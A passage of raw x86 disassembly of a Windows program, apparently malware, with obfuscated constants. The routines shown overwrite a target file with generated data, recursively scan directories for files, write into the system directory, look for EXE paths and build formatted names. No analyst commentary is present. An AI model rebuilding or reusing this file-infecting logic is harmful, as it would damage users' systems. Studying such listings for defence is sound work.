add eax, [ebp+var_31F44]
movsx edx, word_44B0B0
sub edx, 4
sub eax, edx
mov [ebp+var_31F48], eax
mov edi, dword_44B098
movsx edx, word_44B19C
mov ecx, edi
add ecx, edx
mov edx, [ebp+var_C]
movsx eax, word_44B1BC
add eax, edi
mov edi, eax
sub edi, 0Ch
add edx, edi
mov edi, edx
add edi, [ebp+var_4]
mov edx, [ebp+var_31F48]
mov [edi+ecx*4-34h], edx
loc_43D5F5: ; CODE XREF: sub_43C38A+1161�j
; sub_43C38A+1183�j ...
inc [ebp+var_C]
loc_43D5F8: ; CODE XREF: sub_43C38A+FF3�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_43D382
push [ebp+var_1070]
call ds:dword_449650 ; CloseHandle
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_4471F4
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_43D632: ; CODE XREF: sub_43C38A+12AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D632
mov [ebp+var_31ED4], eax
mov edx, dword_44B198
add edx, dword_44B158
sub edx, 5
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED4]
mov edx, dword_44B0C0
movsx ecx, word_44B180
add edx, ecx
sub edx, 5
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED4]
mov edx, dword_44B140
sub edx, 7
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, dword_44B098
movsx edx, word_44B128
add eax, edx
sub eax, 7
push eax
push 2
push 0
mov eax, dword_44B18C
add eax, dword_44B1B0
sub eax, 1
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call ds:dword_44A788 ; CreateFileA
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call ds:dword_44AB8C ; WriteFile
push [ebp+var_1070]
call ds:dword_449650 ; CloseHandle
push [ebp+var_4]
call ds:dword_447618 ; LocalFree
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call ds:dword_448364 ; CopyFileA
lea eax, [ebp+var_116F]
push eax
call ds:dword_445008 ; DeleteFileA
mov eax, 1
jmp short loc_43D73F
; ---------------------------------------------------------------------------
loc_43D728: ; CODE XREF: sub_43C38A+BA�j
; sub_43C38A+D4�j ...
push [ebp+var_1070]
call ds:dword_449650 ; CloseHandle
push [ebp+var_4]
call ds:dword_447618 ; LocalFree
xor eax, eax
loc_43D73F: ; CODE XREF: sub_43C38A+56�j
; sub_43C38A+139C�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C38A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D744 proc near ; CODE XREF: sub_43B780+197�p
; sub_43B780+23B�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_43D759: ; CODE XREF: sub_43D744+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D759
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_43D76B: ; CODE XREF: sub_43D744+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43D76B
mov esi, eax
mov eax, dword_44B104
add eax, dword_44B164
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_43D7DF
; ---------------------------------------------------------------------------
loc_43D787: ; CODE XREF: sub_43D744+A1�j
movsx eax, word_44B19C
mov ebx, eax
add ebx, dword_44B160
sub ebx, 0Eh
mov eax, dword_44B10C
mov edi, eax
add edi, dword_44B0A0
sub edi, 0Bh
jmp short loc_43D7D8
; ---------------------------------------------------------------------------
loc_43D7AB: ; CODE XREF: sub_43D744+96�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_43D7DC
inc ebx
cmp ebx, esi
jnz short loc_43D7D7
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_43D7D7
mov eax, [ebp+var_4]
jmp short loc_43D7EC
; ---------------------------------------------------------------------------
loc_43D7D7: ; CODE XREF: sub_43D744+81�j
; sub_43D744+8C�j
inc edi
loc_43D7D8: ; CODE XREF: sub_43D744+65�j
cmp edi, esi
jb short loc_43D7AB
loc_43D7DC: ; CODE XREF: sub_43D744+7C�j
inc [ebp+var_4]
loc_43D7DF: ; CODE XREF: sub_43D744+41�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_43D787
mov eax, 0FFFFh
loc_43D7EC: ; CODE XREF: sub_43D744+91�j
pop edi
pop esi
pop ebx
leave
retn
sub_43D744 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D7F1 proc near ; CODE XREF: sub_44108E+441�p
; sub_44108E+452�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_444B40
push esi
push edi
push 5
push [ebp+arg_0]
call ds:dword_445004 ; GetWindow
mov edi, eax
loc_43D80D: ; CODE XREF: sub_43D7F1+7D�j
or edi, edi
jnz short loc_43D815
xor eax, eax
jmp short loc_43D870
; ---------------------------------------------------------------------------
loc_43D815: ; CODE XREF: sub_43D7F1+1E�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call ds:dword_446010 ; GetClassNameA
mov eax, dword_44B1C4
add eax, dword_44B0B8
sub eax, 8
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_43D744
add esp, 0Ch
mov esi, dword_44B1B4
add esi, 0FFFEh
add esi, dword_44B164
cmp eax, esi
jz short loc_43D863
mov eax, edi
jmp short loc_43D870
; ---------------------------------------------------------------------------
loc_43D863: ; CODE XREF: sub_43D7F1+6C�j
push 2
push edi
call ds:dword_445004 ; GetWindow
mov edi, eax
jmp short loc_43D80D
; ---------------------------------------------------------------------------
loc_43D870: ; CODE XREF: sub_43D7F1+22�j
; sub_43D7F1+70�j
pop edi
pop esi
leave
retn
sub_43D7F1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D874 proc near ; DATA XREF: .data:0044B2E0�o
push ebp
mov ebp, esp
movsx eax, word_44B128
add eax, dword_44B174
sub eax, 9
cmp ds:dword_447604, eax
jbe short loc_43D89A
push offset dword_447604
call ds:dword_445010 ; InterlockedDecrement
loc_43D89A: ; CODE XREF: sub_43D874+19�j
mov eax, ds:dword_447604
pop ebp
retn 4
sub_43D874 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43D8A3 proc near ; CODE XREF: sub_43C154+BB�p
; sub_43E5D5+1C3�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_444B40
push ebx
push esi
push edi
movsx edi, word_44B170
imul esi, dword_44B130, 3C0h
lea edi, [edi+edi+0EA50h]
lea edi, [esi+edi+780h]
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_444AC5
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
mov edx, dword_44B0EC
sub edx, 4
cmp eax, edx
jnz short loc_43D91D
push offset dword_44C5C4
call sub_4424C1
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44A634
add esp, 8
jmp loc_43DA0A
; ---------------------------------------------------------------------------
loc_43D91D: ; CODE XREF: sub_43D8A3+55�j
call ds:dword_448228
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, dword_44B138
add edx, dword_44B0C0
sub edx, 7
cmp eax, edx
jnz short loc_43D991
mov eax, dword_44B0E4
add eax, 5
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_43BF3D
add esp, 0Ch
push offset asc_44C594 ; ","
call sub_4424C1
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44A634
add esp, 10h
jmp short loc_43DA0A
; ---------------------------------------------------------------------------
loc_43D991: ; CODE XREF: sub_43D8A3+9D�j
mov eax, dword_44B160
sub eax, 8
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword_44B2B0
call sub_43BF3D
add esp, 0Ch
push offset word_44C536
call sub_4424C1
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
sub edi, dword_44B0C4
push edi
push offset dword_448230
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call ds:dword_44A634
add esp, 30h
loc_43DA0A: ; CODE XREF: sub_43D8A3+75�j
; sub_43D8A3+EC�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word_44B128
inc eax
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, dword_44B0C4
movsx edx, word_44B16C
add eax, edx
sub eax, 8
push eax
push 0
call ds:dword_44A63C ; MultiByteToWideChar
push offset asc_44C51C ; "\t"
call sub_43EFD7
add esp, 4
push eax
call ds:dword_445044
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call ds:dword_445044
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call ds:dword_44ABA0
push [ebp+var_EF30]
call ds:dword_44ABA0
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_43D8A3 endp
; =============== S U B R O U T I N E =======================================
sub_43DAA4 proc near ; DATA XREF: .data:0044B2A4�o
mov eax, 80004001h
retn 10h
sub_43DAA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DAAC proc near ; CODE XREF: sub_43DAAC+27E�p
; sub_43DAAC+2E6�p ...
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 268h
push ebx
push esi
push edi
push 0
call ds:dword_44A630
xor ebx, ebx
inc ebx
push offset byte_44C511
call sub_4424C1
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call ds:dword_44A634
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call ds:dword_448258 ; FindFirstFileA
mov [ebp+var_248], eax
movsx ecx, word_44B0DC
add ecx, dword_44B0A8
sub ecx, 8
neg ecx
cmp eax, ecx
jnz loc_43DCE4
mov eax, dword_44B09C
sub eax, 8
cmp [ebp+arg_20], eax
ja loc_43DDA1
mov eax, dword_44B1A4
add eax, 3FAh
add eax, dword_44B094
cmp [ebp+arg_24], eax
jnb short loc_43DB4E
mov eax, dword_44B09C
add eax, 9Ch
cmp [ebp+arg_24], eax
jnz loc_43DDA1
loc_43DB4E: ; CODE XREF: sub_43DAAC+8D�j
movsx eax, word_44B128
add eax, 30D40h
cmp [ebp+arg_24], eax
ja loc_43DDA1
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call ds:dword_44A780 ; CompareFileTime
mov [ebp+var_260], eax
movsx eax, word_44B150
sub eax, 5
cmp [ebp+var_260], eax
jge short loc_43DB96
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_43DBA1
; ---------------------------------------------------------------------------
loc_43DB96: ; CODE XREF: sub_43DAAC+DB�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_43DBA1: ; CODE XREF: sub_43DAAC+E8�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call ds:dword_44A778 ; FileTimeToSystemTime
mov eax, dword_44B1CC
mov edx, dword_44B1B8
movzx ecx, [ebp+var_24E]
movzx esi, [ebp+var_250]
movsx edi, word_44B168
lea edi, [eax+edi+30h]
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_252]
mov edi, dword_44B158
lea edi, [edx+edi+15h]
imul esi, edi
mov edi, dword_44B1C4
add edi, 37h
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_256]
mov edi, dword_44B1CC
add edi, 1Ah
imul esi, edi
mov edi, dword_44B138
add edi, 10h
add edi, dword_44B1B0
imul esi, edi
mov edi, dword_44B14C
add edi, 36h
imul esi, edi
add ecx, esi
movzx esi, [ebp+var_258]
mov edi, dword_44B094
add edi, 2
add edi, eax
mov eax, esi
imul eax, edi
movsx esi, word_44B100
movsx edi, word_44B180
lea esi, [esi+edi+0Fh]
imul eax, esi
mov esi, dword_44B0AC
add esi, 0Dh
add esi, dword_44B09C
imul eax, esi
movsx esi, word_44B110
lea edx, [edx+esi+35h]
imul eax, edx
mov edx, ecx
add edx, eax
mov [ebp+var_25C], edx
mov eax, edx
mov edx, ds:dword_445024
cmp eax, edx
ja loc_43DDA1
sub edx, eax
mov eax, dword_44B178
add eax, 0Ah
add eax, dword_44B10C
cmp edx, eax
jnb loc_43DDA1
mov eax, dword_44B0E4
add eax, 0A2h
cmp [ebp+arg_24], eax
jz short loc_43DCD2
push 0
push [ebp+arg_0]
call sub_442E96
add esp, 8
jmp loc_43DDA1
; ---------------------------------------------------------------------------
loc_43DCD2: ; CODE XREF: sub_43DAAC+212�j
push 1
push [ebp+arg_0]
call sub_442E96
add esp, 8
jmp loc_43DDA1
; ---------------------------------------------------------------------------
loc_43DCE4: ; CODE XREF: sub_43DAAC+63�j
cmp [ebp+var_112], 2Eh
jz loc_43DD9D
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push offset aSS ; "%s\\%s"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43DAAC
add esp, 154h
jmp short loc_43DD9D
; ---------------------------------------------------------------------------
loc_43DD37: ; CODE XREF: sub_43DAAC+2F3�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call ds:dword_446004 ; FindNextFileA
mov ebx, eax
or ebx, ebx
jz short loc_43DDA1
cmp [ebp+var_112], 2Eh
jz short loc_43DD9D
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push offset aSS ; "%s\\%s"
lea eax, [ebp+var_242]
push eax
call ds:dword_44A634
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_43DAAC
add esp, 154h
loc_43DD9D: ; CODE XREF: sub_43DAAC+23F�j
; sub_43DAAC+289�j ...
or ebx, ebx
jnz short loc_43DD37
loc_43DDA1: ; CODE XREF: sub_43DAAC+74�j
; sub_43DAAC+9C�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43DAAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DDA6 proc near ; DATA XREF: .data:0044B29C�o
push ebp
mov ebp, esp
mov eax, dword_44B0C4
sub eax, 4
cmp ds:dword_44A784, eax
jbe short loc_43DDC4
push offset dword_44A784
call ds:dword_445010 ; InterlockedDecrement
loc_43DDC4: ; CODE XREF: sub_43DDA6+11�j
mov eax, ds:dword_44A784
pop ebp
retn 4
sub_43DDA6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DDCD proc near ; CODE XREF: sub_43C38A+2E1�p
; sub_43C38A+3C9�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, dword_44B098
sub edi, 7
cmp edx, edi
jnz short loc_43DDF1
mov eax, [ebp+arg_0]
jmp short loc_43DE0B
; ---------------------------------------------------------------------------
loc_43DDF1: ; CODE XREF: sub_43DDCD+1D�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_43DE0B: ; CODE XREF: sub_43DDCD+22�j
pop edi
pop esi
leave
retn
sub_43DDCD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DE0F proc near ; CODE XREF: sub_442E96+499�p
; DATA XREF: sub_43B52C+B4�o
var_26C = byte ptr -26Ch
var_267 = byte ptr -267h
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 26Ch
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call ds:dword_4475FC ; GetSystemDirectoryA
lea eax, [ebp+var_168]
push eax
call sub_43BFE5
push offset word_44C506
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call ds:dword_445020
push offset word_44C4FE
call sub_4424C1
push eax
lea esi, [ebp+var_104]
push esi
call ds:dword_445020
add esp, 24h
movsx eax, word_44B1A8
add eax, dword_44B158
mov dl, [ebp+arg_0]
mov [ebp+eax+var_267], dl
push 0
push 80h
push 4
push 0
movsx eax, word_44B100
movsx edx, word_44B090
add eax, edx
sub eax, 0Ah
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
push 0
lea eax, [ebp+var_26C]
push eax
mov eax, dword_44B1C8
dec eax
push eax
lea eax, [ebp+var_267]
push eax
push edi
call ds:dword_44AB8C ; WriteFile
push edi
call ds:dword_449650 ; CloseHandle
pop edi
pop esi
leave
retn
sub_43DE0F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43DEF2 proc near ; CODE XREF: sub_4438E7+179�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_444B40
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
call sub_444B60
lea ecx, [ebp+var_12104]
or eax, 0FFFFFFFFh
loc_43DF1A: ; CODE XREF: sub_43DEF2+2D�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43DF1A
mov ebx, dword_44B184
add ebx, dword_44B0CC
sub ebx, 6
mov esi, eax
sub esi, ebx
mov ebx, dword_44B1A0
sub ebx, 6
mov [ebp+esi+var_12104], bl
push 0
mov eax, dword_44B15C
movsx edx, word_44B100
add eax, edx
sub eax, 0Dh
push eax
push 3
push 0
mov eax, dword_44B17C
movsx edx, word_44B148
add eax, edx
sub eax, 9
push eax
push 80000001h
lea eax, [ebp+var_12104]
push eax
call ds:dword_44A788 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_43E1C7
push 0
lea eax, [ebp+var_12110]
push eax
push 1FFFh
lea eax, [ebp+var_1FFF]
push eax
push edi
call ds:dword_445028 ; ReadFile
mov [ebp+var_12108], eax
push edi
call ds:dword_449650 ; CloseHandle
movsx eax, word_44B1A8
movsx edx, word_44B0BC
add eax, edx
sub eax, 9
cmp [ebp+var_12108], eax
jz loc_43E1C7
cmp [ebp+var_1FFF], 4Ch
jnz loc_43E1C7
movzx esi, [ebp+var_1FB3]
movzx ebx, [ebp+var_1FB2]
movzx ebx, bx
shl ebx, 8
or esi, ebx
mov [ebp+var_1210A], si
movzx eax, [ebp+var_1210A]
mov edx, dword_44B0F0
add edx, 46h
movsx ecx, word_44B114
add edx, ecx
add eax, edx
movsx edx, word_44B0D0
add edx, 2
add eax, edx
mov [ebp+var_12000], ax
movzx eax, [ebp+var_12000]
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44B17C
sub edx, 6
cmp eax, edx
jz loc_43E1C7
movzx eax, [ebp+var_12000]
mov edx, dword_44B0A0
add edx, 4
add eax, edx
movsx eax, [ebp+eax+var_1FFF]
mov edx, dword_44B15C
sub edx, 3
cmp eax, edx
jnz loc_43E1C7
movzx eax, [ebp+var_12000]
movsx edx, word_44B0F4
mov ecx, dword_44B0D4
lea edx, [edx+ecx+6]
mov ecx, eax
add ecx, edx
movzx edx, [ebp+ecx+var_1FFF]
mov esi, dword_44B094
add esi, 0Ah
add esi, dword_44B1B4
mov ebx, eax
add ebx, esi
movzx esi, [ebp+ebx+var_1FFF]
movzx esi, si
shl esi, 8
mov ebx, edx
or ebx, esi
mov esi, ebx
movzx esi, si
mov ebx, eax
add ebx, esi
mov esi, ebx
mov [ebp+var_1210C], si
movzx eax, [ebp+var_1210C]
lea eax, [ebp+eax+var_1FFF]
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_444B60
lea ecx, [ebp+var_11FFE]
or eax, 0FFFFFFFFh
loc_43E0F5: ; CODE XREF: sub_43DEF2+208�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43E0F5
mov edi, eax
mov eax, dword_44B0AC
add eax, 1
mov edx, edi
sub edx, eax
cmp [ebp+edx+var_11FFE], 2Eh
jnz short loc_43E18C
mov eax, dword_44B0EC
add eax, dword_44B1C0
sub eax, 5
mov edx, edi
sub edx, eax
movsx eax, [ebp+edx+var_11FFE]
push eax
call ds:dword_445030
add esp, 4
cmp eax, 45h
jnz short loc_43E18C
mov esi, dword_44B190
sub esi, 1
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_445030
add esp, 4
cmp eax, 58h
jnz short loc_43E18C
movsx esi, word_44B0B0
add esi, dword_44B0A4
sub esi, 9
mov ebx, edi
sub ebx, esi
movsx esi, [ebp+ebx+var_11FFE]
push esi
call ds:dword_445030
add esp, 4
cmp eax, 45h
jz short loc_43E18E
loc_43E18C: ; CODE XREF: sub_43DEF2+220�j
; sub_43DEF2+249�j ...
jmp short loc_43E1C7
; ---------------------------------------------------------------------------
loc_43E18E: ; CODE XREF: sub_43DEF2+298�j
push offset byte_44C4F9
call sub_4424C1
push eax
lea edi, [ebp+var_11FFE]
push edi
call ds:dword_445020
mov eax, dword_44B190
movsx edx, word_44B1BC
add eax, edx
sub eax, 9
push eax
lea eax, [ebp+var_11FFE]
push eax
call sub_442A46
add esp, 14h
loc_43E1C7: ; CODE XREF: sub_43DEF2+93�j
; sub_43DEF2+DB�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_43DEF2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E1CC proc near ; CODE XREF: sub_43B52C+22E�p
; sub_441FCC+192�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
inc esi
mov edi, dword_44B0A0
add edi, 1Bh
mov eax, esi
test eax, eax
jge short loc_43E1ED
add eax, 0FFh
loc_43E1ED: ; CODE XREF: sub_43E1CC+1A�j
sar eax, 8
movsx ebx, word_44B194
add ebx, 9
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_8], edi
mov edi, dword_44B174
add edi, 0Ch
mov eax, esi
test eax, eax
jge short loc_43E218
add eax, 0FFh
loc_43E218: ; CODE XREF: sub_43E1CC+45�j
sar eax, 8
movsx ebx, word_44B1BC
add ebx, 0Bh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_C], edi
movsx edi, word_44B19C
mov ebx, dword_44B0AC
lea edi, [edi+ebx+18h]
mov eax, esi
test eax, eax
jge short loc_43E24B
add eax, 0FFFFh
loc_43E24B: ; CODE XREF: sub_43E1CC+78�j
sar eax, 10h
mov ebx, dword_44B140
add ebx, 0Fh
mov edx, eax
imul edx, ebx
add edi, edx
mov [ebp+var_10], edi
mov eax, esi
mul [ebp+var_8]
mov [ebp+var_1C], eax
and eax, 0FFh
push eax
call sub_441020
mov ebx, eax
mov [ebp+var_1], bl
mov eax, dword_44B0FC
add eax, 5
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_44022F
mov ebx, eax
mov [ebp+var_11], bl
mov eax, esi
mul [ebp+var_C]
mov [ebp+var_20], eax
and eax, 0FFh
push eax
call sub_441020
mov ebx, eax
mov [ebp+var_12], bl
mov eax, dword_44B1CC
add eax, 6Ah
add eax, dword_44B0A8
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_44022F
mov ebx, eax
mov [ebp+var_13], bl
mov eax, esi
and eax, 0FFh
push eax
call sub_441020
mov ebx, eax
mov [ebp+var_14], bl
mov eax, dword_44B1CC
add eax, 2Bh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_44022F
mov ebx, eax
mov [ebp+var_15], bl
mov eax, esi
mul [ebp+var_10]
mov [ebp+var_24], eax
and eax, 0FFh
push eax
call sub_441020
mov ebx, eax
mov [ebp+var_16], bl
mov eax, dword_44B1A4
add eax, 49h
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_44022F
mov ebx, eax
mov [ebp+var_17], bl
mov eax, dword_44B14C
add eax, 3Dh
mov edx, esi
imul edx, eax
mov eax, edx
and eax, 0FFh
push eax
call sub_441020
add esp, 24h
mov ebx, eax
mov [ebp+var_18], bl
movzx edi, [ebp+var_1]
mov eax, edi
shr eax, 1
mov esi, dword_44B188
add esi, 2
mul esi
mov [ebp+var_28], eax
mov esi, eax
cmp esi, edi
jnz short loc_43E3C1
push offset byte_44C4DF
call sub_4424C1
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44A634
add esp, 30h
jmp short loc_43E405
; ---------------------------------------------------------------------------
loc_43E3C1: ; CODE XREF: sub_43E1CC+1AD�j
push offset dword_44C4C4
call sub_4424C1
movzx edi, [ebp+var_18]
push edi
movzx edi, [ebp+var_17]
push edi
movzx edi, [ebp+var_16]
push edi
movzx edi, [ebp+var_15]
push edi
movzx edi, [ebp+var_14]
push edi
movzx edi, [ebp+var_13]
push edi
movzx edi, [ebp+var_12]
push edi
movzx edi, [ebp+var_11]
push edi
movzx edi, [ebp+var_1]
push edi
push eax
push [ebp+arg_0]
call ds:dword_44A634
add esp, 30h
loc_43E405: ; CODE XREF: sub_43E1CC+1F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_43E1CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43E40A proc near ; DATA XREF: .data:0044B2AC�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
mov eax, dword_44B174
inc eax
cmp ds:dword_44761C, eax
jnb short loc_43E438
movsx eax, word_44B16C
sub eax, 4
mov ds:dword_44761C, eax
loc_43E438: ; CODE XREF: sub_43E40A+1D�j
mov edi, dword_44B0AC
sub edi, 3
